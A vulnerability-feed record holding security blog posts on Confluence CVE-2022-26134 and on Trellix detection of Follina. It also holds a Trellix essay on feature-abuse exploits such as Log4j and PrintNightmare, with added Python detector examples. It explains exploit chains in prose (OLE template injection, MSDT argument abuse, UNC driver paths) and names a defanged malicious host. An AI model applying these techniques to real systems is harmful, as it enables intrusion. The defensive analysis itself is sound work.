You can download the latest version from the [download centre](<https://www.atlassian.com/software/confluence/download-archives>).\n\nThe post [[updated] Unpatched Atlassian Confluence vulnerability is actively exploited](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2022-06-03T14:41:58", "type": "malwarebytes", "title": "[updated]Unpatched Atlassian Confluence vulnerability is actively exploited", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-03T14:41:58", "id": "MALWAREBYTES:CA300551E02DA3FFA4255FBA0359A555", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited/", "cvss": {"score": 0.0, "vector": "NONE"}}], "trellix": [{"lastseen": "2022-07-19T00:00:00", "description": "# Countering Follina Attack (CVE-2022-30190) with Trellix Network Security Platform\u2019s Advanced Detection Features\n\nBy Vinay Kumar and Chintan Shah \u00b7 July 19, 2022\n\n## Executive summary\n\nAt the end of May 2022, an independent security researcher reported a vulnerability (assigned CVE-2022-30190) in the Microsoft Support Diagnostic Tool (MSDT), which could be exploited to execute arbitrary code when MSDT is called using the URI protocol. The URI protocol **ms-msdt:/** could also be invoked from a malicious Word document, which, when opened by the victim, would allow malicious code to execute on the target machine with the privileges of the calling application. In response to the reported vulnerability, Microsoft released [the advisory and guidance](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) on disabling the MSDT URI protocol. 
Subsequently, the vulnerability was patched in the [June security updates](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) released by Microsoft. Since then, this vulnerability has been found to be exploited by multiple state actors in [targeted attack campaigns](<https://www.bleepingcomputer.com/news/security/windows-msdt-zero-day-now-exploited-by-chinese-apt-hackers/>).\n\nAt Trellix, we are committed to protecting our customers from upcoming and emerging threats on the network, inclusive of those that are found being exploited in the wild. Trellix Network Security Platform\u2019s (Trellix NSP) Intrusion Prevention Research Team strives to build advanced detection features, improving the product\u2019s overall threat detection capabilities.\n\nOver the next few sections of this blog, we will highlight a couple of advanced detection features in Trellix NSP which help protect customers against this and future attacks of a similar nature.\n\n## Introduction \n\nAn MS Word document exploiting the Microsoft Support Diagnostic Tool vulnerability (CVE-2022-30190) was first found to be [submitted to VT](<https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/>) on 27th May 2022 from Belarus with the file name **05-2022-0438.doc**. The number 0438 turns out to be the area code of the region **Follina** in Italy, hence the name. The exploit document is not found to be connected to Italy in any way.\n\n Figure 1: Sample submission history on VirusTotal \n\n\nThere is no dearth of instances where one of MS Office\u2019s core features, Object Linking and Embedding (OLE), has been abused as an initial attack vector, and CVE-2022-30190 was no different. This was yet another classic example of chaining OLE with another logic flaw to achieve arbitrary code execution on the target machine. 
Traditionally, Object Linking and Embedding has contributed significantly to building weaponized Office exploits, and we believe this will continue to happen. As with the earlier CVE-2021-40444 and many other exploits, OLE was found to be used for linking the document to an externally hosted object, in this case an HTML file. \n\nThe [MS Office Open XML specifications](<https://www.ecma-international.org/publications-and-standards/standards/ecma-376/>) state that an Office Open XML document can embed objects or link to external objects, which are specified via relationships. Any embedded or linked object specified in the container application (the OOXML document in this case) must be identified by its unique **ProgID** string. As per the specifications, this string must be used to determine the type of the object and the application used to load the object data. An excerpt from the document specifications is shown below:\n\n Figure 2: Specs on Embedded objects \n\n\nAs documented in the [ISO-29500-4 specifications](<https://standards.iso.org/ittf/PubliclyAvailableStandards/c071692_ISO_IEC_29500-4_2016.zip>), ST_OLEType defines the type of the OLE object in **document.xml**, either linked or embedded, and **ProgID=\u201dhtmlfile\u201d** indicates the type of the linked object data. As shown in the CVE-2022-30190 exploit document below, the **document.xml.rels** file has a Type attribute specifying the relationship as \u201coleObject\u201d, a **Target** attribute set to the OLE object link, and **TargetMode** set to external. 
This allows the crafted document to link to an externally hosted, potentially malicious object and invoke the respective protocol handlers to render the object, which can lead to the exploitation of logic flaws in the object renderers.\n\n Figure 3: Structure of exploit document \n\n\nLooking at the document.xml.rels file, it contains an external reference to the malicious domain for retrieving the HTML file:\n\n**hxxps://www.xmlformats.com/office/word/2022/wordprocessingDrawing/RDF842l.html!**. The HTML file hosted on this domain contains a script block with commented lines. This is required to make the HTML file sufficiently large (precisely, greater than 4KB) for it to be processed and rendered by mshtml.dll. \n\n Figure 4: downloaded html file from server \n\n\nSubsequently, the script tries to invoke the PCWDiagnostic package using the MSDT URI protocol handler with multiple arguments, one of which is IT_BrowseForFile, which can take an embedded PowerShell script within $( ) as an argument, resulting in code execution. The PowerShell script is Base64 encoded, and its decoded form is shown below. \n\n Figure 5: Decoded PowerShell script \n\n\nAs we see in the decoded payload, the script is intended to run the malicious rgb.exe on the target system. Summarizing the sequence involved in the attack:\n\n * A malicious MS Office document with a linked object is delivered to the victim, possibly as part of a phishing campaign.\n * On opening the document, the malicious HTML script is rendered, leading to arbitrary code execution on the affected system. \n\nWindows registers a large number of URI protocol handlers which could potentially be abused to exploit similar flaws. 
For instance, the [search-ms](<https://docs.microsoft.com/en-us/windows/win32/search/getting-started-with-parameter-value-arguments>) URI protocol handler, used to query the Windows search indexing feature, can be abused by attackers to connect to a remote SMB share on an attacker-controlled server. However, it does not directly lead to code execution, as it requires multiple levels of user interaction, but a query can be crafted to lure users into executing legitimate-looking executables, as shown below. Both of these URI protocol attacks were first [reported here](<https://benjamin-altpeter.de/shell-openexternal-dangers/>).\n\n Figure 6: search-ms query to connect to remote location \n\n\n**How Trellix NSP protects against Follina**\n\nTrellix NSP has been one of the most advanced and mature IPS products in the security industry. Over time, we have developed cutting-edge features to deal with complex attack scenarios that involve handling encoding, compression, and complex file formats. **Microsoft Office Deep File Inspection** and **Multi Attack ID Correlation** are two of these. We use a combination of these advanced capabilities to detect the entire attack cycle. In the following sections, we will try to understand how the Trellix Network Security Platform\u2019s advanced inspection capabilities highlighted above can help correlate multiple low- or medium-severity events to detect phases in the attack cycle, thereby raising the overall confidence level.\n\n**Microsoft Office Open XML (OOXML) file format**\n\nThe OLE file format that was traditionally used in Microsoft Office has been replaced by Office Open XML. Office Open XML (OOXML) is a zipped, XML-based file format developed by Microsoft for representing spreadsheets, charts, presentations, and word processing documents. In a nutshell, this means that the whole document is contained in a zip package. Multiple files and directories together form the document. 
There are directories like _[Content_Types].xml , _rels, docProps_, which are basic part of all office zip packages, and then there is a directory specific to document type _(word directory for docx, xl and ppt directory for xlsx and pptx respectively)_. For each of the document type the specific directory would contain different files limited to the type. Like in case of a docx type, the \u2018word\u2019 directory contains document.xml file which has the core content of the document. Here is a brief overview about important files under these directories: \n\n**[Content_Types].xml** \nThis file contains the MIME type information for parts of the package. It uses defaults for certain file extensions and overrides for parts specified by Internationalized Resource Identifier.\n\n**_rels** \nThis directory contains the relationship information for files within the package.\n\n**_rels/.rels** \nThis is the location where applications look first to find the package relationships.\n\n**docProps/core.xml** \nThis file contains the core properties for any Office Open XML document.\n\n**word/document.xml** \nThis file is the main part for any Word document.\n\nZip file format specification specifies that a file in the zip archive is stored in a file record structure. For each file in the zip archive, there is a corresponding entry of this structure. \n\n[local file header 1] \n[file data 1] \n[data descriptor 1] \n. \n. \n. \n[local file header n] \n[file data n] \n[data descriptor n] \n \n[archive decryption header] \n[archive extra data record] \n[central directory header 1] \n. \n. \n. \n[central directory header n] \n[zip64 end of central directory record] \n[zip64 end of central directory locator] \n[end of central directory record]\n\nThese structures are placed one after another, structure starts with local file header followed by optional Extra Data Fields and file data (optionally compressed/optionally encrypted). 
Local header contains details about the file data, encryption/compression mechanism along with filename, file size and few more things.\n\n**Local file header**\n\nOffset | Byte | Description \n---|---|--- \n0 | 4 | Local file header signature # 0x04034b50 (read as a little-endian number) \n4 | 2 | Version needed to extract (minimum) \n6 | 2 | General purpose bit flag \n8 | 2 | Compression method \n10 | 2 | File last modification time \n12 | 2 | File last modification date \n14 | 4 | CRC-32 \n18 | 4 | Compressed size \n22 | 4 | Uncompressed size \n26 | 2 | File name length (n) \n28 | 2 | Extra field length (m) \n30 | n | File Name \n30+n | m | Extra Field \n0 | 4 | Local file header signature # 0x04034b50 (read as a little-endian number) \n4 | 2 | Version needed to extract (minimum) \n6 | 2 | General purpose bit flag \n \n \n\n\nFor Microsoft documents, deflate compression is used commonly. In a nutshell, the files which constitutes the document are stored in possibly encrypted/compressed format inside the zip package. In the figure below, we dissect this structure for document.xml file present under word directory with a hex editor (010 editor) with zip parsing capabilities which will help us to investigate the details \u2013\n\n Figure 7: Structure for document.xml \n\n\n**Need for deep file inspection**\n\nWe have seen in the past that different vulnerabilities may require the IPS devices to examine the content of the different files present inside zip package. Same is the case with Follina. As explained earlier, this vulnerability abuses Microsoft OOXML **Object Linking and Embedding** functionality linking a file to external resource via the relationship file to load malicious content. Hence it requires the detection device to check the external references used in word/rels/document.xml.rels file. 
\n\n Figure 8: Structure of document.xml.rels \n\n\nSince this file is present, as a compressed entity in the zip archive, a meaningful detection with IPS cannot be done until the file is decompressed. With NSP\u2019s unique in industry capability, known as Deep File inspection, this is possible. \n\nThis is implemented using protocol parsing capability of the NSP. The local file header structure for the specific file is parsed and the compressed data of the file is decoded. This feature can be used by enabling it from the inspection option policy.\n\n Figure 9: Policy configuration to enable MS Office Deep File Inspection \n\n\n_For more details, please refer to NSP documentation_\n\n**Some of the key highlights: deep file inspection **\n\n * This feature helps to decompress the file contents inline; the complete file is not required to be downloaded for inspection \n * It also gives the flexibility to decompress only the content of a selected file (individual file present inside zip achieve), yielding better performance since the whole zip archive is not required to be decompressed .\n * The individual files (which are part of zip package) can be controllably decompressed by specifying byte limit per file. This plays a great role in improving performance while doing inline inspection.\n\nTrellix NSP Attack ID **0x452a8400 - HTTP: OLE Object Linking Detected in OOXML File** \u2013 uses the Microsoft Office Deep file inspection feature to detect signs of external object linking. However, just checking for external OLE references will not be sufficient until it is ascertained that the external URI does the malicious activity. Since we know that external URI loads the HTML which invokes the MSDT handler in a malicious fashion. 
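The inspection described above, as an added example in Python (not Trellix NSP code): the local file headers are walked in the order the table above gives, only the relationship part is inflated (with a byte limit, as deep file inspection does), and any oleObject relationship whose TargetMode is External is reported. The sample package, the relationship IDs and the target URL are constructed for this example.

```python
"""
Added example (not Trellix NSP code): walk a zip package's local file headers,
decompress only word/_rels/document.xml.rels up to a byte limit, and flag
relationships that link to an external OLE object.
"""
import io
import struct
import zipfile
import zlib
import xml.etree.ElementTree as ET
from typing import Iterator, List, Optional, Tuple

LOCAL_FILE_HEADER_SIG = 0x04034B50
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"

# Constructed relationship part: one ordinary internal part and one external oleObject link.
CONSTRUCTED_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    f'<Relationships xmlns="{REL_NS}">'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
    f'<Relationship Id="rId99" Type="{OLE_TYPE}" Target="https://example.invalid/constructed.html!" TargetMode="External"/>'
    "</Relationships>"
)


def build_constructed_docx() -> bytes:
    """Minimal OOXML-like zip package used as test input (constructed, not a real document)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/_rels/document.xml.rels", CONSTRUCTED_RELS)
    return buf.getvalue()


def iter_local_headers(data: bytes) -> Iterator[Tuple[str, int, int, int]]:
    """Yield (name, compression method, compressed size, offset of file data)
    by walking the 30-byte local file headers in order; stops at the central directory."""
    pos = 0
    while pos + 30 <= len(data):
        (sig, _ver, flags, method, _mtime, _mdate, _crc,
         csize, _usize, nlen, xlen) = struct.unpack_from("<IHHHHHIIIHH", data, pos)
        if sig != LOCAL_FILE_HEADER_SIG:
            break
        name = data[pos + 30:pos + 30 + nlen].decode("utf-8", "replace")
        data_offset = pos + 30 + nlen + xlen
        if flags & 0x8:
            break  # sizes live in a trailing data descriptor; an inline walk cannot skip ahead
        yield name, method, csize, data_offset
        pos = data_offset + csize


def extract_member(data: bytes, wanted: str, byte_limit: int = 64 * 1024) -> Optional[bytes]:
    """Inflate only the wanted member and stop after byte_limit output bytes."""
    for name, method, csize, off in iter_local_headers(data):
        if name != wanted:
            continue
        raw = data[off:off + csize]
        if method == 0:   # stored
            return raw[:byte_limit]
        if method == 8:   # deflate (raw stream, no zlib header)
            return zlib.decompressobj(-15).decompress(raw, byte_limit)
        return None       # encrypted or unsupported method: not inspected here
    return None


def find_external_ole_links(rels_xml: bytes) -> List[str]:
    """Return Target values of oleObject relationships whose TargetMode is External."""
    hits = []
    for rel in ET.fromstring(rels_xml).iter(f"{{{REL_NS}}}Relationship"):
        if rel.get("Type") == OLE_TYPE and rel.get("TargetMode", "Internal").lower() == "external":
            hits.append(rel.get("Target", ""))
    return hits


def inspect_docx(data: bytes) -> List[str]:
    """Full check: external oleObject targets found in the document's relationship part."""
    rels = extract_member(data, "word/_rels/document.xml.rels")
    return [] if rels is None else find_external_ole_links(rels)


if __name__ == "__main__":
    print(inspect_docx(build_constructed_docx()))
```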
Invoking MSDT through HTML content is detected by Trellix NSP Attack ID **0x452ac200 – HTTP: Microsoft Support Diagnostic Tool Remote Code Execution Vulnerability (CVE-2022-30190)**.

**Detecting the attack chain using Multi Attack ID Correlation**

Attack visualization is better when the dots can be connected between the different stages of the attack. The Multi Attack ID Correlation capability helps achieve this by correlating multiple attacks.

Trellix NSP Attack ID **0x43f02000 HTTP: Microsoft Support Diagnostic Tool RCE Vulnerability (CVE-2022-30190)** utilizes this capability and correlates "HTTP: OLE Object Linking Detected in OOXML File (0x452a8400)" and "HTTP: Microsoft Support Diagnostic Tool Remote Code Execution Vulnerability (CVE-2022-30190) (0x452ac200)" to generate a correlated attack event.

The alert generated using Multi AID Correlation is of high confidence and severity and helps security admins take further action. This feature is built into Trellix NSP by default and no extra configuration is required to enable it.

**Some of the key highlights: Multi Attack ID Correlation**

* Two or more attacks can be correlated.
* Provides the capability to quarantine the attacker (configurable from the policy).
* Correlation uses attributes such as:
  * Source IP / destination IP: this attribute helps correlate attacks originating from the same source IP and/or targeted at the same destination IP.
  * Lifetime: the maximum time interval within which all correlated signature events should occur.
  * Threshold: detection of an attack happening repeatedly within a specific period.

With these strong correlation capabilities covering the complete attack cycle, the Trellix Network Security Platform Threat Detection solution balances effectiveness and performance extremely well. The Trellix NSP Research and Engineering team actively monitors emerging threat patterns and builds the features and capabilities to enhance the overall detection efficacy of the Intrusion Prevention System.

## Conclusion

We have seen multiple vulnerabilities in the past using exploitation techniques similar in nature, and this is yet another addition to the series. In our previous blog, outlining the current state of memory corruption vulnerabilities and the challenges faced in exploiting them, we also highlighted the exploitation strategies of the future, and the **Follina** attack validates our prediction very well. While the exploitation of different classes of memory corruption vulnerabilities can be eliminated by introducing mitigations at either the operating system or the hardware level, vulnerabilities exploiting design flaws will remain a challenge. Perimeter and endpoint security solutions will have to evolve to address those challenges by introducing innovative inspection and detection techniques, alongside applying secure software design and development practices during application development.
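As an added illustration of the Multi Attack ID Correlation described in the section above (this is not Trellix NSP code; the Event and Rule types, the correlation key and the events are constructed for the example), a toy correlator that raises the 0x43f02000 event only when both component attack IDs are seen for the same host inside the lifetime window. Only the IP and lifetime attributes are modelled; threshold counting is left out.

```python
"""
Added example (not Trellix NSP code): correlate two attack IDs for the same host
within a lifetime window and emit the combined attack ID named on this page.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, FrozenSet, List, Tuple

AID_OLE_LINK = 0x452A8400  # HTTP: OLE Object Linking Detected in OOXML File
AID_MSDT = 0x452AC200      # HTTP: Microsoft Support Diagnostic Tool RCE Vulnerability (CVE-2022-30190)
AID_CORRELATED = 0x43F02000  # emitted once both stages are seen


@dataclass(frozen=True)
class Event:
    ts: float      # seconds since an arbitrary epoch
    aid: int
    src_ip: str    # HTTP client (the host receiving the document / HTML)
    dst_ip: str    # HTTP server


@dataclass(frozen=True)
class Rule:
    emit_aid: int
    members: FrozenSet[int]   # component attack IDs that must all be seen
    lifetime: float           # max seconds between the oldest and newest member event
    key: str = "src"          # correlate on "src" (client) or "dst" (server) address


def correlate(events: List[Event], rule: Rule) -> List[Tuple[int, str, float]]:
    """Return (emitted_aid, correlation_key, ts_of_completing_event) for each completed chain.
    Events are processed in time order; per key, the newest sighting of each member AID is
    kept, sightings older than the lifetime are dropped, and one alert is raised per chain."""
    seen: Dict[str, Dict[int, float]] = defaultdict(dict)
    out: List[Tuple[int, str, float]] = []
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.aid not in rule.members:
            continue
        key = ev.src_ip if rule.key == "src" else ev.dst_ip
        seen[key][ev.aid] = ev.ts
        for aid, ts in list(seen[key].items()):
            if ev.ts - ts > rule.lifetime:
                del seen[key][aid]   # aged out of the window
        if rule.members.issubset(seen[key]):
            out.append((rule.emit_aid, key, ev.ts))
            seen[key].clear()        # one correlated alert per completed chain
    return out


FOLLINA_RULE = Rule(AID_CORRELATED, frozenset({AID_OLE_LINK, AID_MSDT}), lifetime=300.0)

# Constructed events: 10.0.0.5 receives a document with an external OLE link and fetches the
# MSDT-invoking HTML two minutes later; 10.0.0.9 completes the second stage far too late.
CONSTRUCTED_EVENTS = [
    Event(100.0, AID_OLE_LINK, "10.0.0.5", "198.51.100.7"),
    Event(220.0, AID_MSDT, "10.0.0.5", "198.51.100.7"),
    Event(130.0, AID_OLE_LINK, "10.0.0.9", "198.51.100.7"),
    Event(900.0, AID_MSDT, "10.0.0.9", "198.51.100.7"),
]

if __name__ == "__main__":
    for aid, host, ts in correlate(CONSTRUCTED_EVENTS, FOLLINA_RULE):
        print(f"{aid:#010x} correlated for {host} at t={ts}")
```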
Source record: type trellix; id TRELLIX:D8DB23FAEBC16DCFBC54050BEBBF650D; published 2022-07-19; title "Countering Follina Attack (CVE-2022-30190) with Trellix Network Security Platform's Advanced Detection Features"; CVEs: CVE-2021-40444, CVE-2022-30190; href: https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/countering-follina-attack-with-network-security-platforms-advanced-detection-features.html

Source record: lastseen 2022-01-24

# Beyond Memory Corruption Vulnerabilities – A Security Extinction and Future of Exploitation

By Chintan Shah · January 24, 2022

Modern exploitation techniques have changed how adversaries execute their attack strategies and how defenders analyze the paths from vulnerability to exploitation. Over the past decade, we have seen a rock-solid focus on hardening security at both the operating system and the application level, which has resulted in remarkable progress in introducing several exploit mitigations. This progress has in some cases gradually eliminated entire classes of memory corruption vulnerabilities. Use-after-free (UAF), for example, is a class of vulnerabilities that is very common in large, complex code bases such as web browsers. Because of their ease of exploitation, Microsoft introduced an isolated heap and delayed freeing of objects in its browser engine (mshtml.dll), breaking the UAF exploitation chain and forcing adversaries to address those barriers by re-engineering their exploits. Figure 1 below shows the part of the code where this was introduced to mitigate UAF vulnerabilities.

**Figure 1 – mshtml introduction of the isolated heap to raise the exploitation bar for UAF exploitation**

We can notice the difference between the protected and unprotected code. While this was just the tip of the iceberg, it made exploiting UAF vulnerabilities extremely challenging, since it required attackers to address specific timing constraints and memory thresholds as well. Figure 2 below is a simple visualization of the Windows OS memory exploit mitigations introduced over the past decade or so.

**Figure 2 – Evolution of Windows OS exploit mitigations**

However, time and again, we have seen these exploit mitigations bypassed within a short period after they were introduced, primarily because not all of the code, including dependent and third-party code, was compatible with or compiled with those mitigations switched on in the compiler. This essentially meant that the exploit mitigation was not enforced on every part of the code, or the mitigation itself was not completely implemented, leaving multiple loopholes which in turn could be exploited. For instance, it can be noted from the above visualization that ASLR was not initially implemented in its entirety but rather in stages, thereby leaving much of the code still vulnerable to bypasses.

##### Memory corruption vulnerabilities – will they become a thing of the past?

While memory corruption vulnerabilities continue to be the most widely reported class of bugs, converting them into full-fledged weaponized exploits has become a challenge in recent years owing to the exploit mitigations introduced at the OS level as well as in client-side applications (for example, scripting engines). Translating memory corruption vulnerabilities into full-blown exploits leading to arbitrary code execution requires bypassing multiple mitigations without triggering any endpoint security solution's protection or detection. This means adversaries must now invest significant effort, time and cost in researching exploit mitigation bypasses. On several occasions, adversaries may also need to chain multiple vulnerabilities to be able to execute a working exploit on the target system, which also significantly increases the development cost, raising the bar of exploitation.

We believe that this evolution of exploit mitigations is going to be crucial in shaping the nature of the vulnerability classes of interest to adversaries in the future. The question "Will memory corruption vulnerabilities become extinct?" is debatable and requires some introspection.

##### Exploitation strategies of the future – what lies ahead?

Memory corruption vulnerabilities will continue to exist in applications as long as there is some code in the application that handles memory incorrectly, but the intensity and frequency of exploitation of this class of vulnerabilities will eventually fade. We have witnessed multiple instances of exploitation techniques in the past where attackers achieved arbitrary memory read/write (R/W) by exploiting a memory corruption flaw and then used that primitive to change certain flags or data in the application's memory, leading to code execution. This set of methods, codenamed "data-only attacks", was a relatively easy strategy seen in many exploits. Eventually, randomizing the locations of certain critical data structures in memory reduced this kind of attack over time.

With feature-rich applications, attackers will always be on the lookout for easier strategies to achieve code execution on the target system. There are always legacy systems exposed to the internet which offer the path of least resistance to attackers, since they lack the mitigations introduced later. Beyond those, one of the ways forward in this direction is to abuse a feature or design flaw in the application or in the network protocol.
If adversaries can determine a way to abuse the inherent design or features of the target application, for instance by making the application or a service connect to an attacker-controlled machine without manipulating memory explicitly, it becomes relatively easier to achieve remote code execution and at the same time cause havoc on the target machine, since the functionality of the arbitrary code executed by the exploited process is limited only by the imagination of the attacker. Figure 3 below is a simplistic view of the progression of exploitation strategies over the last few years.

**Figure 3 – Adversary exploitation strategy evolution**

We have witnessed data-only attacks and the abuse of application features and design flaws several times over the last few years. They offer multiple advantages over traditional memory corruption exploits, and some of the reasons we believe this is going to be the exploitation strategy of the future are:

* It has the potential to bypass the exploit mitigations in place, and hence adversaries do not have to engineer the exploit specifically to address those barriers.
* Arbitrary code is executed with the privileges of the exploited process, which helps in elevating privileges.
* Exploits taking advantage of an application's built-in features or design flaws do not have to deal with explicit memory manipulation and space constraints before the vulnerability is exploited. Consequently, they do away with injecting shellcode into memory and with the older stack pivoting techniques.
* They are relatively easier to exploit, with lower development and maintenance cost and less time to weaponize.

Retrospection on the critical vulnerabilities of the last couple of quarters can give us a definite clue as to how future attacks will take shape. In the following sections, we take a look at some of the more recent high-impact vulnerabilities and examine how features or design flaws in the service or application were abused to achieve code execution or sensitive information leaks with minimum resistance.

##### CVE-2021-44228 – Apache Log4j2 Logging Library Vulnerability Leading to Remote Code Execution

This RCE vulnerability reported in Apache's Log4j logging library is one of the most critical flaws reported in recent years, allowing attackers to execute arbitrary code on any vulnerable server that uses the Log4j logging library to log text messages. [In our previous blog](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/vulnerability-discovery-in-open-source-libraries-part-1-tools-of-the-trade/>), we discussed at great length how open source software serves as the building block of modern software development and how critical it is to audit it, as any vulnerability will have a significant impact on the products using it.

The vulnerability lies in the "**lookup**" method of the "**JndiManager**" class. When a JNDI URL is included in a request message parameter to be logged by Log4j, the apache\logging\log4j\core\lookup\JndiLookup.lookup() method is called with the JNDI URL, which in turn calls the net\JndiManager.lookup() method as shown in the figure below, initiating a remote JNDI lookup to the attacker-controlled server. This allows the attacker-controlled server to send a malicious JNDI reference in the response, leading to the execution of arbitrary code on the vulnerable server.

**Figure 4 – JNDI lookup**

This RCE was made possible because Java implements a variety of JNDI (Java Naming and Directory Services) service providers such as LDAP, DNS, RMI and CORBA; loading remote classes was also possible, depending on the default system properties set.

**CVE-2021-44228** is a classic example of feature exploitation. The feature abused here is [lookup substitution](<https://logging.apache.org/log4j/2.x/manual/configuration.html#PropertySubstitution>), which supports [Lookups](<https://logging.apache.org/log4j/2.x/manual/lookups.html>). Lookups are a way to add values to log messages; they are typically variable names resolved using a defined map or at runtime via implemented interfaces such as the [StrSubstitutor](<https://logging.apache.org/log4j/2.x/log4j-core/apidocs/org/apache/logging/log4j/core/lookup/StrSubstitutor.html>) and [StrLookup](<https://logging.apache.org/log4j/2.x/log4j-core/apidocs/org/apache/logging/log4j/core/lookup/StrLookup.html>) classes.

Log4j supports the property syntax "${prefix:name}", where the prefix indicates to Log4j that the variable name should be evaluated in a specific context. The JNDI context is built into Log4j as shown below.

**Figure 5 – JNDI context**

**Figure 6 – JNDI lookup description**

Since JNDI lookups were enabled by default in Log4j version 2.14.1 and prior (see figure 6 above), the library could identify JNDI references passed as parameter values in the HTTP request headers logged on the server, consequently allowing attackers to inject malicious JNDI references in the HTTP request parameters, leading to remote Java code execution.

##### CVE-2021-34527 – Windows Print Spooler Service Vulnerability Leading to Remote Code Execution

The privileged remote code execution vulnerability in spoolsv.exe, i.e. PrintNightmare, was another critical vulnerability reported last year and serves as a good illustration of how a design flaw in a protocol can be abused to execute arbitrary code on the target machine without having to operate on memory.
The vulnerability was exploited over the Print System Remote Protocol ([MS-RPRN](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1>)) and the Print System Asynchronous Remote Protocol ([MS-PAR](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/695e3f9a-f83f-479a-82d9-ba260497c2d0>)) by making RPC calls over SMB. The exploit takes advantage of a classic design flaw in the implementation of the print server component of the spooler service, when RPC requests are made to the MS-RPRN and MS-PAR interfaces to install printer drivers on the target system. Making the RPC call to [RpcAddPrinterDriverEx](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b96cc497-59e5-4510-ab04-5484993b259b>) (MS-RPRN Opnum 89) or [RpcAsyncAddPrinterDriver](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/5d864e3e-5d8b-4337-89ce-cb0258ab97cd>) (MS-PAR Opnum 39) requires a DRIVER_CONTAINER structure to be passed as an argument.

**Figure 7 – DRIVER_CONTAINER structure**

As indicated in the structure details above, DRIVER_CONTAINER contains **pDriverPath** and **pConfigFile**, which are the full paths of the files containing the printer driver and the configuration module respectively. Both **pDriverPath** and **pConfigFile** are checked for UNC paths to prevent arbitrary code from loading.

The design or logic flaw in the code here is that the same UNC path check is not applied to **pDataFile**, which is the full path of the file containing printer data. An adversary could make multiple calls to **RpcAddPrinterDriverEx** with:

1. **pDataFile** set to the UNC path of a malicious DLL accessible to the target machine; when successful, this copies the malicious DLL to the target machine locally.
2. The same API with the copied file name assigned to **pConfigFile** (this time the malicious DLL is a local path), leading to the loading of malicious code by the print spooler service.

**Figure 8 – Adversary calls to driver installation API RpcAddPrinterDriverEx**

##### CVE-2021-36942 – LSA Spoofing Vulnerability in Windows Leading to Credential Leaks

RPC over SMB has always been at the forefront of many exploitation methods. This vulnerability could be exploited by again abusing the [MS-EFSRPC](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31>) protocol, which is used in Windows to manage files on a remote system that are encrypted using the [Encrypting File System](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/230807ac-20be-494f-86e3-4c8ac23ea584#gt_3bd30c20-9517-4030-a48c-380362e209a1>) (EFS).

By making specific RPC calls such as [EfsRpcOpenFileRaw](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31>) over the LSARPC interface, an attacker can make one Windows host authenticate to another server; essentially, a target server can be made to authenticate to an adversary-controlled server via NTLM authentication. More importantly, LSARPC calls can be issued without any prior authentication, and if the target server is an Active Directory (AD) domain controller, the adversary can make AD connect to an arbitrary server using the machine account for NTLM authentication. The EFSRPC protocol can thus be abused to chain multiple vulnerabilities within the enterprise network to relay NTLM credentials to an attacker-controlled server, which could be used to perform lateral movement, eventually leading to complete domain compromise.

**Figure 9 – Adversary making RPC call to EFSRPC interface**

If the adversary is targeting an IIS web server with the Active Directory Certificate Services (AD CS) feature installed and configured to use NTLM over HTTP authentication, making Active Directory authenticate to IIS will result in leaking the NTLM credentials to the adversary, resulting in complete domain compromise. While NTLM relay attacks aren't new, it is recommended to use a more secure authentication mechanism such as Kerberos to prevent protocol abuse like this.

**Figure 10 – Authentication providers in IIS web server**

In summary, being able to abuse a protocol or a feature to make a critical asset connect to an externally owned adversary server comes with dangerous consequences, as demonstrated by the CVE-2021-44228 Log4j vulnerability.

##### CVE-2021-40444 – Windows MSHTML Vulnerability Leading to Remote Code Execution

This was yet another critical vulnerability exploited last year and is a great example of how a simple feature abuse can be chained with a logic flaw to achieve arbitrary code execution. First, Object Linking and Embedding (OLE) was used to link the document to an external OLE object. Historically, OLE has played a significant role in building weaponized Office exploits, and this will continue to happen, as it is one of the core features of the MS Office file format designed specifically to address interoperability.

The [MS Office Open XML specification](<https://www.ecma-international.org/publications-and-standards/standards/ecma-376/>) allows a document to embed or link to internal or external objects; in particular, a link to an external OLE object is specified via relationships. As shown in the crafted exploit document below, the **document.xml.rels** file has a relationship with the **Type** attribute set to "oleObject", the **Target** attribute set to the OLE object link and **TargetMode** set to External.
This allows the crafted document to link to the externally hosted malicious object and invoke the respective protocol or resource handler to render the object, exploiting a potential logic or design flaw in the handler. This is the typical OOXML template injection technique used in many OOXML exploits in the past. We had an in-depth look at OLE exploits in our [previous blog post](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/an-inside-look-into-microsoft-rich-text-format-and-ole-exploits/>).

**Figure 11 – document.xml.rels file in the OOXML document linking to external OLE object**

